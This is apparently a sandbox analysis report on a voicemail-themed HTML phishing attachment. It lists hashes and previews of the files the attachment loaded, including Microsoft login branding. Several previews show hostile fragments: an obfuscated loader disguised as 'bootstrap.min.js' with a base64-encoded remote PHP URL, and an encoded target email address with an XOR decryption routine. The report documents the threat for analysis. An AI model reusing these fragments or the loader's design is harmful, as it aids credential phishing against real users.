                                          MD5:01ECC545C03D2F2BAC6FDB323F21B659
                                          SHA1:14EAAD981A88626026946D0C3D3711FEE9D074D8
                                          SHA-256:1E80A4935CDEB2BB5A6FDFD4602F93C7309BAA419E16867F4DB0BEEE4F86E30B
                                          SHA-512:04CA85AEED8F15256A91BF3BF30C2EC1E871E574FC92B8FABEF6B9075CAC0B7DF45AF784BA66DBDDD5B341C2A6A04D719DB629421DE1A084CC97ED1ADEC4F17D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://6256461081-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrap.min.js
                                          Preview:var file = "aHR0cHM6Ly9tLmFyY2FuZXBhdGh3YXlzLml0LmNvbS9nb29nbGUucGhw";....var _0x328e7e=_0x5934;function _0x5934(_0x16ca03,_0x541b4c){var _0x5f0c3c=_0x29fd();return _0x5934=function(_0x3f3d5b,_0x1d80df){_0x3f3d5b=_0x3f3d5b-(0x144+0x2*-0x895+-0x9d*-0x1d);var _0x512a2d=_0x5f0c3c[_0x3f3d5b];return _0x512a2d;},_0x5934(_0x16ca03,_0x541b4c);}(function(_0x313f87,_0x57dc23){var _0x1101e4=_0x5934,_0x128fc2=_0x313f87();while(!![]){try{var _0x486dfe=-parseInt(_0x1101e4(0x19ac))/(0x2221*0x1+-0x874+-0x19ac)+parseInt(_0x1101e4(0x1af9))/(0x1ac7+0x25a2+0x1*-0x4067)+-parseInt(_0x1101e4(0x2282))/(0x1b*0x8b+0x768*0x4+-0x2c46)+parseInt(_0x1101e4(0x27e4))/(-0x103d+-0x22eb+0x332c)+parseInt(_0x1101e4(0x2c80))/(0x23c8+0x7bb*-0x1+-0x138*0x17)*(-parseInt(_0x1101e4(0x23aa))/(-0x1374+-0x2*-0x55e+0x8be))+-parseInt(_0x1101e4(0xbe3))/(-0xb1*-0x1d+0x1a35+-0x523*0x9)+-parseInt(_0x1101e4(0x29c9))/(-0x1276+-0x1bb3+0x2b*0x113)*(-parseInt(_0x1101e4(0x25a0))/(-0x1*0x20ae+-0x94e+0x1f*0x15b));if(_0x486dfe===_0x57dc23)break;e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:data
                                          Category:downloaded
                                          Size (bytes):13529
                                          Entropy (8bit):7.981473427014176
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3EEFFD5E7F96EE19160EE0825AE7125A
                                          SHA1:972607DACBF55571A329CC15151D8D62BC95CA42
                                          SHA-256:6F15987DCBA055366BF7ECEC02A42949E326C4548F11DA42124F58A22FFCF0E6
                                          SHA-512:39EEF3197AA3AF7CB3D9613117660988B43D612F3A802D5A53938A9504CE2FB321ADE6941B57D9577CB97B7A0746FE35D77E513E92282B389DB74F9F5E892BC6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                          Preview:./..HNZ=....z....Y....2.]Gu)..........L..@zv..r.].51..%.f....U.s.....t...VCR..m...Mw.+~*...Hl`*.....p.}.... ..8s.<..4>".sLQ....l..C...!4]HjJ.......@?.*...A).:.v?..U{no:.7$...1>@'*cR..KE.RJ........E...8.|hu.....j..*..'..%.S.9..3......x2.}.O...*.u...*....L...=..[x?.{...../.........%].`2...h#K_q....jN.;.....?....vy.......wQ.d..w... ..aWD..qm.q,.v..... ..g._j..L..+......._.qM.....D.,....q.....|.<!....@.y$y.....A..g.[.A....n...S.......X./..n..9.5Y.)k....o..qj?.%......p{.md........zH.j....u....9[..fv0F..G...8.F..&...7..+.|sO.k..W..W.....4...]>........._..0d..2.l.....7..:..2x..$.O].eq..,.....f]n"c#..r..T...w[..[e...E.q,...........zP.i.k...N.=..1..@8.SV..h.FK6.m...)...6r....3.`.9.......K.......p.[|.5n...H.(...D..d.X......D......,..=....n.Y....o.y..{@0S......)Kn.\.k3.8.....#....^}.n..L..g{..K./.E.....[...........]...$.....+C.%.....\.K..Eq,.Ch.....".A..nK..R...'1 2]'3..U.\..:!..O....*...C.KK..YB...b..y-..~1iA...VN .V...^&.w.}.w...v....(......HC{.Y...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 200 x 60, 8-bit/color RGBA, interlaced
                                          Category:downloaded
                                          Size (bytes):2720
                                          Entropy (8bit):7.908488457721472
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2C49E036261D734981171E40813DB783
                                          SHA1:DD1EEAA11968CE97C525A616ECEAC98387CCB68B
                                          SHA-256:09EC35EB7BD6E0191B9A9A113CBBB7602F20B21FAF17D3CC7824BEE8DCB15F2B
                                          SHA-512:C3C7906ABB5E8B76702EA6C62FAB7647740B1F4B65C9EEB84FB50EDC56AD4F521CC36C81183A4AB0413EFF8E11BB819B73D9D2598DC16E6F19E73931CE3989F1
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauthimages.net/dbd5a2dd-dd6sjnbck-d7jqe7c7hresn1xmfbyqxjgfkew0drbtm/logintenantbranding/0/bannerlogo?ts=636650519160295793
                                          Preview:.PNG........IHDR.......<.....T\......pHYs...........~....RIDATx...Q.;..7........0...0.<RA..G*..T...L...b*....Y...;.gsa.3....u.q+i.c....G........C.>..-t...R\..0...?...X.d.6.1...u.y?^...q$S...r.N:..^...r.......9~..f....3!'c.......'IK=]..).2.L.....S..e.rr.R.s3.R...GN..Q.3......k`.\...J....6$T.g................../e.bD7 ..U`.A!Aw..E...5..5..aoz..,'...b.F.;-#.#...n2.pY..w.....{?t..pB..H*.0.uNX.Ft..4.&.....d&J..uf".-3!;.1...z.......r=.[.H...".Wm..d$.....=e.<#.FK....4fDI|)../...I.f-...|...yT.aF...F...LY.....!!.k=h..xk.g............z4...g..'......d...5..^.dtHc.05..N.....W.Q+$.0.~..z.....U..d}.....;4..B.5.1@Ag..p..o..*..^d.YL?.!..\..r.{..........Z.#.e...BP.U8.D(.....|..a..g.C.......L..-.l......R...:..H....q...O.Xm. ..*.ey..R../..@..Y<!../.....B.TD,...J..\u...o....c.pB.e..^kD......B.g.^.u^{o..e..B.._...k......>[.....0...-.}9.N.s..'j..f`.4TL.j.....i.Q.....'.....G...f..QEQB..S.........a..3j..lZ......G.e..5..#...._W._7.J..(.&.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32012)
                                          Category:downloaded
                                          Size (bytes):69597
                                          Entropy (8bit):5.369216080582935
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:downloaded
                                          Size (bytes):1746
                                          Entropy (8bit):7.0941604123505115
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FF9BBAC9E01B1DDD59C87D1E8DD194D1
                                          SHA1:018AD340A895FB021B57B3C08A4D88646F2981F1
                                          SHA-256:C28BD21CF6420D2282292B8FD5DF776B62B68C9681AEDC0D2E73D6444C0BF3A1
                                          SHA-512:CC7AEF1C346579FF31A504B82D719D73A15A895D08494AF0BA6905CD5DDF4B147FEA627E96AF4AAB8F177A84283F51F10FEF08C71C75851023A0ECF9A26A681E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.png
                                          Preview:RIFF....WEBPVP8L..../..?..:..)....Lef..x...^..@.T..Ybf.%y.....PD.<.......eK.[c.|. 9..H..g).....O\ue.....n$I...~.@/..9'6....4.{.Q....m;m........7_...e.....N.s'.....A+.>.tz \.zg...............8.8.[.q.]..Z.....k.....M.< ..\...A.............h..O..............e..$.SE$K.....6..!..?..?....iT.?..?..?..?.3...}TE......@y.......X.p.O....}.p|X.J...................(.........e....?..."...............k\I................m..q...g.*...{.Rs............/...a....j.............b..8L.Ti.;.........r@....._.....`Ta....>;.....9.....RXU.].J.~.9..L...5......9............9..(.We...)..d..0.t-....g.9...._.h.../.u,../6k.....h.;........q.........!..N...?..../}..{..?......g...w4.....g.....9.`l....o!.~qpD."rj.M...>..>Q.O.....5......c.....9.`../...K..2.K5<.SU.J...IpV...........Ui.......n............/..8...?...5..2.e.N..i...uS?e..`....\0.......j..........>j-".(Q,..T...o....%43.`P...P.W.}.........j$...>&...\u...Zo...s.2l..QkUl....s........]7......>'j.=7..1.|...~..T=...qX;........s..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6596900876595075
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0E176276362B94279A4492511BFCBD98
                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:data
                                          Category:downloaded
                                          Size (bytes):14464
                                          Entropy (8bit):7.9800169877863985
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4A8BA408601003ED83365E4A5C15D0FA
                                          SHA1:8D5AD3DE3AAA6CFF8A19824B2055674E1358033D
                                          SHA-256:FD21B9DE637DE917232AD7A8D0778B0B2BC13D36BA90B909E78313D3CAE9B46D
                                          SHA-512:BA07FEB28061789812AE4DD05E3FC27CEE391D1D3DEDE393C8BCBC9B6C3439E617D0F5F999D2CEF5F2897C067D06204EB982E965F9872614FDEB096214B4337E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                          Preview:.^.H......>.}.............Vpr.%.....6v...pXJ..&.=..&....K..H...2. .eY.)B.]x...((AP........?...roIV{........n{...m..=.."f........*.3. .YjR....u.:...~....p......w..?.....D..k.!+....Y.1.k.J._..........p..Zgg..Zg...k.vpw.k...Y.....+.u^..............O.....o...<:..7:...A.T...d.rx.;...G.....k....*2......".....>h..f++..pn.....|[p.m.....Ys!.m.R.R......@j0.d......%.&.N.!.j.v.A.?E...&.y.t.Q.._.....C.G....U.....f[qTip.5......p.P.-....-.&.vY...D.m..A.^......q<6..%./K..yI....i.q..8..y.N...R..^..../9..*....)...(=.....YM....P.@...}...|.....w.n..y.d[..*.k..N..P#........3..+.X._.O..~3.E......E...}Z.....ao.D..-..8...QAH.g.....~.X.....1..6S@G~".S..I..*m..e.<../u.iW.h........V.)OdJ..Z...j&.cN.Y..5f..t8....2.i........Z....Q@A...p.K.q.3.`.;.c./q.s......W..=.....k..G|.g|._x.7x._....w.....~.w..U..E.).E.X)f...Bq..U\*.+..F.T.)......c..Hq..U.).*...._....*^+.*>*.)>+>).R.R.Q.S..x..U..o..?.?).S.....(..10z.1c,...k.-.1g\1..7.%.q..g.d.3..G....c..q.x...........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (19015)
                                          Category:downloaded
                                          Size (bytes):19188
                                          Entropy (8bit):5.212814407014048
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                          Category:dropped
                                          Size (bytes):13
                                          Entropy (8bit):3.334679141051595
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5D80401E01D33084C65E94F93351E94C
                                          SHA1:FB2E51CBD24E286DD066BD419D77CD772967E384
                                          SHA-256:F96DEFF1816083FDFF8BC3E46C3FE6CA46A6BB49F4D5A00627616C13237A512C
                                          SHA-512:654B3BC259DB923BCA2FB5AC8D8C2AA5CEDDF594CCE152D2A467850AE092317206E3BEA307C8528E05442811F5EF8C4CCB9DAA4DA2A56DDC7F436C6EE1AEE7D0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(./.$.......Q
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32065)
                                          Category:downloaded
                                          Size (bytes):85578
                                          Entropy (8bit):5.366055229017455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                          Category:downloaded
                                          Size (bytes):17174
                                          Entropy (8bit):2.9129715116732746
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                          File type:HTML document, ASCII text, with very long lines (8704), with CRLF line terminators
                                          Entropy (8bit):3.454368083596415
                                          TrID:
                                          • HTML Application (8008/1) 100.00%
                                          File name:#U25baPlay_VM-NowATTT0003.html
                                          File size:9'179 bytes
                                          MD5:1fbee6e66c293ff085cb6295de3d701c
                                          SHA1:e0f9d651660e3397bbc934cac55046a184b3beff
                                          SHA256:73234ea4cf67ca57ab268f1f0a79239e5eda7a093258d6f7c03574abb91283f0
                                          SHA512:83d1bbccccd306d52a7162f13882da9f7eef0e4c9bc07d2b8cddeee87247be697329e671b0ba12d49951e7832b509dd063794eae1f15b2338d75974174ac5dc8
                                          SSDEEP:192:LSh+KiUTWFr9V+e5yIxFV0nRTLXnrBqe/3mE+5trhgzHjRkalwdq:Lk+CaFr9IgyIxFV0nRTrnrBqq2EeRhAR
                                          TLSH:211256630756576EB3C005E2D118321B14E6DD2B687D216EFB5378CBFC6E98284BCB22
                                          File Content Preview:<script>..let rh13z8jemt = 'c3RhY3kud29vZGJ1cnlAc3dnYXMuY29t'; // Aliqua exercitation occaecat turducken dolore.....const key = "secret";..const xorEncryptDecrypt = (input, key) => {.. let output = "";.. const charCodes = input.split(",").map(Number
                                          Icon Hash:1270ce868a8686b8